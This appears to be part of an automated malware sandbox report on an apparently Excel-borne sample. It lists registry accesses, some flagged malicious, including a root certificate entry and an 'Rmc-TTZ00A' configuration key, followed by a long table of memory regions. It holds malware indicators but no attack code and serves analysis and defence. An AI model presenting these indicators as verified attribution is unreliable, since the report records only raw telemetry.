 malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
 malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
2v0
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\28DED
28DED
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
9 0
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33F22
33F22
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\340A8
340A8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\34940
34940
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\340A8
340A8
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Rmc-TTZ00A
exepath
HKEY_CURRENT_USER\Software\Rmc-TTZ00A
licence
HKEY_CURRENT_USER\Software\Rmc-TTZ00A
time
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 82 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
 malicious
7F5000
heap
page read and write
 malicious
831000
heap
page read and write
 malicious
7BF000
stack
page read and write
 malicious
10000
heap
page read and write
2AA2000
trusted library allocation
page read and write
2EBB000
trusted library allocation
page read and write
4175000
heap
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
43C000
heap
page read and write
1F70000
direct allocation
page read and write
5E6000
heap
page read and write
4EA000
heap
page read and write
1C335000
heap
page read and write
1C92B000
stack
page read and write
521000
heap
page read and write
370E000
trusted library allocation
page read and write
3F1D000
heap
page read and write
46D000
heap
page read and write
2D1E000
trusted library allocation
page read and write
998000
heap
page read and write
119000
heap
page read and write
7FE89B00000
trusted library allocation
page read and write
7FE899E0000
trusted library allocation
page execute and read and write
4495000
heap
page read and write
12011000
trusted library allocation
page read and write
376000
heap
page read and write
1F20000
heap
page read and write
2E5D000
stack
page read and write
3F6000
heap
page read and write
2A1F000
stack
page read and write
7FE899D8000
trusted library allocation
page read and write
34B000
stack
page read and write
4905000
heap
page read and write
1BF0000
heap
page read and write
4049000
heap
page read and write
4A42000
heap
page read and write
5A0000
heap
page read and write
7FE897D4000
trusted library allocation
page read and write
7FE899CC000
trusted library allocation
page read and write
3EDD000
heap
page read and write
4890000
heap
page read and write
2A99000
trusted library allocation
page read and write
453000
heap
page read and write
1AABF000
heap
page read and write
1C2000
stack
page read and write
25C8000
trusted library allocation
page read and write
4A8E000
heap
page read and write
3929000
trusted library allocation
page read and write
7FE89C20000
trusted library allocation
page read and write
374000
heap
page read and write
2D1B000
trusted library allocation
page read and write
2E1F000
stack
page read and write
133D000
stack
page read and write
1BE6000
heap
page read and write
305F000
stack
page read and write
114A000
heap
page read and write
449B000
heap
page read and write
23F000
stack
page read and write
238000
heap
page read and write
5350000
trusted library allocation
page read and write
3F1E000
heap
page read and write
4FC5000
heap
page read and write
460000
trusted library allocation
page read and write
2CA6000
heap
page read and write
1B2DB000
stack
page read and write
629000
heap
page read and write
470000
heap
page read and write
2D08000
trusted library allocation
page read and write
1A9000
heap
page read and write
53E000
heap
page read and write
4A7000
heap
page read and write
3ADC000
stack
page read and write
39A9000
trusted library allocation
page read and write
74E000
stack
page read and write
1BB0000
heap
page read and write
370E000
trusted library allocation
page read and write
44A5000
heap
page read and write
1C100000
heap
page read and write
7FE89AA2000
trusted library allocation
page read and write
7FE898C3000
trusted library allocation
page execute and read and write
26D3000
trusted library allocation
page read and write
4DE000
heap
page read and write
30A7000
trusted library allocation
page read and write
2559000
trusted library allocation
page read and write
1B31F000
stack
page read and write
2D1D000
trusted library allocation
page read and write
220000
heap
page read and write
4431000
heap
page read and write
19B000
heap
page read and write
187000
heap
page read and write
1C080000
heap
page read and write
2A9D000
trusted library allocation
page read and write
2AA4000
trusted library allocation
page read and write
7FE899B0000
trusted library allocation
page read and write
360000
heap
page read and write
2D15000
trusted library allocation
page read and write
1C33D000
heap
page read and write
4FBB000
heap
page read and write
574000
heap
page read and write
7FE89980000
trusted library allocation
page execute and read and write
3F7F000
heap
page read and write
4F4000
heap
page read and write
10000
heap
page read and write
339000
heap
page read and write
3B00000
trusted library allocation
page read and write
7FE89930000
trusted library allocation
page execute and read and write
30DF000
trusted library allocation
page read and write
195000
heap
page read and write
449D000
heap
page read and write
37E000
heap
page read and write
20000
heap
page read and write
191000
heap
page read and write
969000
heap
page read and write
348000
stack
page read and write
459000
system
page execute and read and write
49ED000
heap
page read and write
406000
heap
page read and write
3810000
trusted library allocation
page read and write
471000
heap
page read and write
1AD46000
heap
page read and write
417000
heap
page read and write
122000
heap
page read and write
494000
heap
page read and write
230000
heap
page read and write
370E000
trusted library allocation
page read and write
1C05E000
stack
page read and write
490B000
heap
page read and write
7FE89AA0000
trusted library allocation
page read and write
1BFA8000
stack
page read and write
59C000
heap
page read and write
1B590000
heap
page read and write
390000
heap
page read and write
7FE898B6000
trusted library allocation
page execute and read and write
4F0000
heap
page read and write
7FE89AB0000
trusted library allocation
page execute and read and write
453000
heap
page read and write
27A000
heap
page read and write
1B41B000
stack
page read and write
D90000
heap
page read and write
404000
heap
page read and write
4FAE000
heap
page read and write
44AD000
heap
page read and write
4BE000
heap
page read and write
26E000
heap
page read and write
370E000
trusted library allocation
page read and write
4FBB000
heap
page read and write
26E000
heap
page read and write
41F000
system
page execute and read and write
54B5000
heap
page read and write
1E70000
heap
page read and write
48E000
heap
page read and write
36EE000
trusted library allocation
page read and write
7FE89B00000
trusted library allocation
page read and write
4A4B000
heap
page read and write
1C500000
heap
page read and write
3930000
trusted library allocation
page read and write
1F24000
heap
page read and write
20000
heap
page read and write
29F000
heap
page read and write
3C0000
heap
page read and write
7FE8988C000
trusted library allocation
page execute and read and write
36EE000
trusted library allocation
page read and write
3935000
trusted library allocation
page read and write
43D000
heap
page read and write
7FE89983000
trusted library allocation
page read and write
490000
heap
page read and write
36EE000
trusted library allocation
page read and write
246F000
stack
page read and write
3930000
trusted library allocation
page read and write
2EBB000
trusted library allocation
page read and write
7FE89880000
trusted library allocation
page read and write
1D13000
trusted library allocation
page read and write
3837000
heap
page read and write
3F3000
heap
page read and write
7FE89A14000
trusted library allocation
page read and write
4A05000
heap
page read and write
2CF000
heap
page read and write
2C32000
heap
page read and write
2210000
trusted library allocation
page execute read
2C3E000
heap
page read and write
3EBC000
heap
page read and write
1CA0E000
stack
page read and write
3935000
trusted library allocation
page read and write
25FE000
stack
page read and write
C8D000
stack
page read and write
7A0000
heap
page read and write
4187000
heap
page read and write
4FA9000
heap
page read and write
1B03C000
stack
page read and write
1F4000
heap
page read and write
140000
trusted library allocation
page read and write
2D0E000
trusted library allocation
page read and write
1B20F000
stack
page read and write
FC000
stack
page read and write
7FE89BE0000
trusted library allocation
page read and write
449B000
heap
page read and write
44A8000
heap
page read and write
2A97000
trusted library allocation
page read and write
498E000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
4067000
heap
page read and write
FEE000
stack
page read and write
94C000
heap
page read and write
370E000
trusted library allocation
page read and write
3E6000
heap
page read and write
36C000
stack
page read and write
1B03F000
stack
page read and write
1F80000
heap
page read and write
21B000
stack
page read and write
1EF0000
heap
page read and write
575000
heap
page read and write
3120000
heap
page read and write
4167000
heap
page read and write
D0000
heap
page read and write
44A000
heap
page read and write
7FE89814000
trusted library allocation
page read and write
11C1000
heap
page read and write
46E000
heap
page read and write
7FE899D4000
trusted library allocation
page read and write
473000
system
page execute and read and write
49F0000
trusted library allocation
page read and write
44A1000
heap
page read and write
3A5F000
stack
page read and write
195000
heap
page read and write
30C000
heap
page read and write
D20000
heap
page read and write
4230000
heap
page read and write
170000
heap
page read and write
4D70000
heap
page read and write
3929000
trusted library allocation
page read and write
2AA2000
trusted library allocation
page read and write
155000
stack
page read and write
2EC000
stack
page read and write
1E00000
direct allocation
page read and write
14D000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
2A9E000
stack
page read and write
2D1D000
trusted library allocation
page read and write
2A7B000
stack
page read and write
1C6AB000
stack
page read and write
37B000
heap
page read and write
191000
heap
page read and write
7FE89A40000
trusted library allocation
page read and write
7FE897EB000
trusted library allocation
page read and write
12FF000
stack
page read and write
370E000
trusted library allocation
page read and write
4067000
heap
page read and write
4A1C000
heap
page read and write
44AB000
heap
page read and write
44AB000
heap
page read and write
36EE000
trusted library allocation
page read and write
1F7F000
stack
page read and write
1AC07000
heap
page read and write
44B000
heap
page read and write
2310000
heap
page read and write
2A9D000
trusted library allocation
page read and write
7C0000
heap
page read and write
182000
stack
page read and write
625000
heap
page read and write
2A99000
trusted library allocation
page read and write
200F000
stack
page read and write
2D1A000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2A9D000
trusted library allocation
page read and write
1A4C4000
heap
page execute and read and write
2A9B000
trusted library allocation
page read and write
44A6000
heap
page read and write
36F000
trusted library allocation
page read and write
629000
heap
page read and write
54B9000
heap
page read and write
10000
heap
page read and write
508000
heap
page read and write
5A4000
heap
page read and write
3F7C000
heap
page read and write
1A4E8000
heap
page execute and read and write
1CE6000
heap
page read and write
20000
heap
page read and write
47C000
heap
page read and write
384B000
heap
page read and write
1A608000
stack
page read and write
1AA55000
heap
page read and write
327F000
stack
page read and write
3FFF000
heap
page read and write
1C84F000
stack
page read and write
590000
heap
page read and write
26C4000
heap
page read and write
28A5000
heap
page read and write
48F7000
heap
page read and write
44A1000
heap
page read and write
1A010000
heap
page read and write
3FC1000
heap
page read and write
595000
heap
page read and write
493000
heap
page read and write
1ABB9000
heap
page read and write
577000
heap
page read and write
490000
heap
page read and write
497000
direct allocation
page read and write
4905000
heap
page read and write
4490000
heap
page read and write
378000
heap
page read and write
2011000
trusted library allocation
page read and write
2BB0000
heap
page read and write
5A3000
heap
page read and write
3BE000
stack
page read and write
4059000
heap
page read and write
40E0000
heap
page read and write
41DC000
heap
page read and write
402000
heap
page read and write
1A89B000
heap
page read and write
49F000
direct allocation
page read and write
7FE89A00000
trusted library allocation
page read and write
E7F000
stack
page read and write
44AD000
heap
page read and write
36EE000
trusted library allocation
page read and write
479000
heap
page read and write
2D14000
trusted library allocation
page read and write
1ADCF000
stack
page read and write
4A46000
heap
page read and write
7FE89990000
trusted library allocation
page execute and read and write
1A4E0000
heap
page execute and read and write
6FE000
stack
page read and write
26CB000
trusted library allocation
page read and write
370E000
trusted library allocation
page read and write
74D000
heap
page read and write
4FB0000
heap
page read and write
1DA0000
direct allocation
page read and write
492000
heap
page read and write
5CE000
stack
page read and write
2CA6000
heap
page read and write
4A85000
heap
page read and write
1CF4000
heap
page read and write
1B230000
heap
page read and write
4491000
heap
page read and write
1AB000
heap
page read and write
487000
direct allocation
page read and write
7FE899A6000
trusted library allocation
page execute and read and write
4DB3000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
3E2F000
stack
page read and write
14D000
heap
page read and write
2C3A000
heap
page read and write
4FC5000
heap
page read and write
44B2000
heap
page read and write
D28000
heap
page read and write
3E74000
heap
page read and write
47F000
heap
page read and write
2C3E000
heap
page read and write
EFD000
stack
page read and write
3A8000
heap
page read and write
2A93000
trusted library allocation
page read and write
5F9000
heap
page read and write
4FBB000
heap
page read and write
299000
heap
page read and write
360D000
stack
page read and write
1AFBF000
stack
page read and write
2852000
trusted library allocation
page read and write
3929000
trusted library allocation
page read and write
2001000
trusted library allocation
page read and write
7FE89BD0000
trusted library allocation
page read and write
58A000
heap
page read and write
55A000
heap
page read and write
51E000
stack
page read and write
1C23B000
heap
page read and write
381E000
stack
page read and write
2EC0000
trusted library allocation
page read and write
4292000
heap
page read and write
3E30000
heap
page read and write
11A6000
heap
page read and write
4FC5000
heap
page read and write
1B234000
heap
page read and write
740000
heap
page read and write
2A9E000
trusted library allocation
page read and write
3930000
trusted library allocation
page read and write
47C000
heap
page read and write
4112000
heap
page read and write
1E50000
direct allocation
page read and write
3B30000
trusted library allocation
page read and write
2D0F000
trusted library allocation
page read and write
9B000
stack
page read and write
7FE89A50000
trusted library allocation
page read and write
4F89000
heap
page read and write
2EBB000
trusted library allocation
page read and write
7FE898F6000
trusted library allocation
page execute and read and write
12031000
trusted library allocation
page read and write
384D000
heap
page read and write
4495000
heap
page read and write
500000
heap
page read and write
303000
heap
page read and write
5D7000
heap
page read and write
17D000
heap
page read and write
2180000
heap
page read and write
280000
trusted library allocation
page read and write
590000
heap
page read and write
4F5A000
heap
page read and write
374000
heap
page read and write
D46000
heap
page read and write
4459000
heap
page read and write
39C0000
trusted library allocation
page read and write
3930000
trusted library allocation
page read and write
370E000
trusted library allocation
page read and write
400000
system
page execute and read and write
2C3E000
heap
page read and write
3929000
trusted library allocation
page read and write
478000
remote allocation
page execute and read and write
1B36F000
stack
page read and write
5F2000
heap
page read and write
B00000
heap
page read and write
36EE000
trusted library allocation
page read and write
2017000
direct allocation
page read and write
4168000
heap
page read and write
32BA000
stack
page read and write
3930000
trusted library allocation
page read and write
44AB000
heap
page read and write
106000
heap
page read and write
390000
heap
page read and write
3B00000
trusted library allocation
page read and write
32C0000
trusted library allocation
page read and write
4A69000
heap
page read and write
384D000
heap
page read and write
2C5B000
heap
page read and write
7FE89AA4000
trusted library allocation
page read and write
520000
heap
page read and write
7FE898CC000
trusted library allocation
page execute and read and write
4462000
heap
page read and write
4488000
heap
page read and write
3AF000
heap
page read and write
7FE8997C000
trusted library allocation
page execute and read and write
1E20000
heap
page execute and read and write
301000
heap
page read and write
449D000
heap
page read and write
4F89000
heap
page read and write
420000
heap
page read and write
1A9000
heap
page read and write
1A1E4000
heap
page read and write
7FE89B50000
trusted library allocation
page read and write
3680000
trusted library allocation
page read and write
7FE899E0000
trusted library allocation
page read and write
1A4C0000
heap
page execute and read and write
1E20000
direct allocation
page read and write
434000
heap
page read and write
10000
heap
page read and write
4DB2000
heap
page read and write
7FE898E0000
trusted library allocation
page read and write
4055000
heap
page read and write
EE000
heap
page read and write
7FE89A30000
trusted library allocation
page read and write
44A1000
heap
page read and write
3C4000
heap
page read and write
572000
heap
page read and write
370E000
trusted library allocation
page read and write
1C1FC000
stack
page read and write
37A000
heap
page read and write
2E0000
trusted library allocation
page read and write
3AFD000
stack
page read and write
483000
direct allocation
page read and write
26DC000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
199000
heap
page read and write
1AC05000
heap
page read and write
1C244000
heap
page read and write
44AD000
heap
page read and write
36EE000
trusted library allocation
page read and write
7FE89AE0000
trusted library allocation
page read and write
10000
heap
page read and write
3E7B000
heap
page read and write
1C6B0000
heap
page read and write
4AD000
direct allocation
page read and write
36EE000
trusted library allocation
page read and write
7F3000
heap
page read and write
1C085000
heap
page read and write
1AECE000
stack
page read and write
1ABFB000
heap
page read and write
4495000
heap
page read and write
3935000
trusted library allocation
page read and write
36EE000
trusted library allocation
page read and write
4FAA000
heap
page read and write
1B3E0000
heap
page read and write
293000
heap
page read and write
124B1000
trusted library allocation
page read and write
4A8E000
heap
page read and write
40E6000
heap
page read and write
370E000
trusted library allocation
page read and write
44A3000
heap
page read and write
3130000
trusted library allocation
page read and write
4466000
heap
page read and write
130000
trusted library allocation
page read and write
2D1D000
trusted library allocation
page read and write
299000
heap
page read and write
4530000
trusted library allocation
page read and write
37C000
stack
page read and write
1C105000
heap
page read and write
7FE89A90000
trusted library allocation
page execute and read and write
2150000
heap
page execute and read and write
1A560000
heap
page read and write
394C000
stack
page read and write
4231000
heap
page read and write
10000
heap
page read and write
362000
stack
page read and write
3E0000
heap
page execute and read and write
3F1D000
heap
page read and write
453000
heap
page read and write
3CF000
heap
page read and write
2D0A000
trusted library allocation
page read and write
329B000
trusted library allocation
page read and write
1FD7000
direct allocation
page read and write
41DE000
heap
page read and write
7FE899F2000
trusted library allocation
page read and write
7FE89B60000
trusted library allocation
page read and write
30AB000
trusted library allocation
page read and write
44B2000
heap
page read and write
530000
heap
page read and write
448E000
heap
page read and write
483000
heap
page read and write
4A8E000
heap
page read and write
1218F000
trusted library allocation
page read and write
1C22A000
heap
page read and write
370E000
trusted library allocation
page read and write
3F7E000
heap
page read and write
3F1D000
heap
page read and write
1AB78000
heap
page read and write
36EE000
trusted library allocation
page read and write
3ECC000
heap
page read and write
1AD10000
heap
page read and write
1AB18000
heap
page read and write
1F90000
direct allocation
page read and write
3F1D000
heap
page read and write
4F6D000
heap
page read and write
1E40000
direct allocation
page read and write
2D4000
heap
page read and write
2EBB000
trusted library allocation
page read and write
4F7E000
heap
page read and write
46D000
heap
page read and write
41DC000
heap
page read and write
36EE000
trusted library allocation
page read and write
42B000
heap
page read and write
7FE89B20000
trusted library allocation
page read and write
44A1000
heap
page read and write
492000
heap
page read and write
2040000
heap
page execute and read and write
3929000
trusted library allocation
page read and write
151000
heap
page read and write
7FE89812000
trusted library allocation
page read and write
2D0000
heap
page read and write
1A62F000
stack
page read and write
3640000
trusted library allocation
page read and write
353000
heap
page read and write
1C50000
heap
page read and write
191000
heap
page read and write
4F69000
heap
page read and write
7FE89AC8000
trusted library allocation
page read and write
4A85000
heap
page read and write
299E000
trusted library allocation
page read and write
48E000
heap
page read and write
38A000
heap
page read and write
387000
heap
page read and write
36EE000
trusted library allocation
page read and write
2AFF000
stack
page read and write
3C7F000
stack
page read and write
5F9000
heap
page read and write
48E000
heap
page read and write
36EE000
trusted library allocation
page read and write
3100000
heap
page read and write
571000
heap
page read and write
48A000
heap
page read and write
36EE000
trusted library allocation
page read and write
3935000
trusted library allocation
page read and write
3EDB000
heap
page read and write
2D1A000
trusted library allocation
page read and write
3F1D000
heap
page read and write
2A80000
remote allocation
page read and write
3D3C000
stack
page read and write
1C760000
heap
page read and write
41CB000
heap
page read and write
4F61000
heap
page read and write
488000
heap
page read and write
2EBB000
trusted library allocation
page read and write
3ED5000
heap
page read and write
370E000
trusted library allocation
page read and write
44A6000
heap
page read and write
2EBB000
trusted library allocation
page read and write
301000
heap
page read and write
1AA89000
heap
page read and write
3EDC000
heap
page read and write
53F000
heap
page read and write
1D5000
stack
page read and write
D0000
heap
page read and write
2B8000
heap
page read and write
49D000
direct allocation
page read and write
50A000
heap
page read and write
4F8B000
heap
page read and write
7FE89A50000
trusted library allocation
page read and write
1C72F000
stack
page read and write
47C000
heap
page read and write
2EBB000
trusted library allocation
page read and write
2D0A000
trusted library allocation
page read and write
7FE8981D000
trusted library allocation
page execute and read and write
3636000
heap
page read and write
2A97000
trusted library allocation
page read and write
7FE89A70000
trusted library allocation
page read and write
1E0000
trusted library allocation
page read and write
11B0000
heap
page read and write
584000
heap
page read and write
1C349000
heap
page read and write
9F30000
trusted library allocation
page read and write
195000
heap
page read and write
1C26000
heap
page read and write
4430000
heap
page read and write
48C7000
heap
page read and write
43C000
heap
page read and write
10A4000
heap
page read and write
F3C000
stack
page read and write
82A000
heap
page read and write
2C39000
heap
page read and write
191000
heap
page read and write
474000
heap
page read and write
35A4000
heap
page read and write
7FE8998C000
trusted library allocation
page read and write
370E000
trusted library allocation
page read and write
2D0E000
trusted library allocation
page read and write
805000
heap
page read and write
39B0000
trusted library allocation
page read and write
1BE000
heap
page read and write
1B115000
heap
page read and write
2D1D000
trusted library allocation
page read and write
4AD000
heap
page read and write
4A46000
heap
page read and write
130000
trusted library allocation
page read and write
2A9B000
trusted library allocation
page read and write
437000
heap
page read and write
30A9000
trusted library allocation
page read and write
408000
stack
page read and write
148000
heap
page read and write
3F1D000
heap
page read and write
106000
heap
page read and write
3C6000
heap
page read and write
4462000
heap
page read and write
9530000
trusted library allocation
page read and write
EBD000
stack
page read and write
2055000
trusted library allocation
page read and write
3930000
trusted library allocation
page read and write
48A000
heap
page read and write
3E71000
heap
page read and write
44A1000
heap
page read and write
7FE89A77000
trusted library allocation
page read and write
3E7B000
heap
page read and write
34F0000
trusted library allocation
page read and write
1AB1D000
heap
page read and write
20A5000
heap
page read and write
4175000
heap
page read and write
2CD000
heap
page read and write
60D000
heap
page read and write
3C2E000
stack
page read and write
515000
heap
page read and write
41DC000
heap
page read and write
1D20000
heap
page execute and read and write
290000
heap
page read and write
44AF000
heap
page read and write
2D08000
trusted library allocation
page read and write
609000
heap
page read and write
46F000
trusted library allocation
page read and write
2C5E000
heap
page read and write
2EBB000
trusted library allocation
page read and write
1FD7000
direct allocation
page read and write
2D0000
heap
page read and write
1C2000
stack
page read and write
3D5E000
stack
page read and write
373E000
stack
page read and write
7FE89AE0000
trusted library allocation
page read and write
571000
heap
page read and write
4A46000
heap
page read and write
36EE000
trusted library allocation
page read and write
125000
heap
page read and write
3ED4000
heap
page read and write
4172000
heap
page read and write
1FF0000
direct allocation
page read and write
14D000
heap
page read and write
422000
heap
page read and write
2A80000
remote allocation
page read and write
7FE89A80000
trusted library allocation
page read and write
3670000
heap
page read and write
480000
direct allocation
page read and write
7FE89A80000
trusted library allocation
page execute and read and write
492000
heap
page read and write
1AB000
heap
page read and write
4C6000
heap
page read and write
7FE89AF0000
trusted library allocation
page read and write
44A4000
heap
page read and write
1EA000
heap
page read and write
7FE899F0000
trusted library allocation
page read and write
453000
heap
page read and write
3ECD000
heap
page read and write
36EE000
trusted library allocation
page read and write
370E000
trusted library allocation
page read and write
7730000
trusted library allocation
page read and write
1B0B0000
heap
page read and write
3060000
heap
page read and write
7FE8991C000
trusted library allocation
page execute and read and write
52C000
heap
page read and write
46E000
stack
page read and write
1D80000
heap
page execute and read and write
41D5000
heap
page read and write
1073000
heap
page read and write
2AA2000
trusted library allocation
page read and write
7FE898C6000
trusted library allocation
page read and write
20A0000
heap
page read and write
5FE000
heap
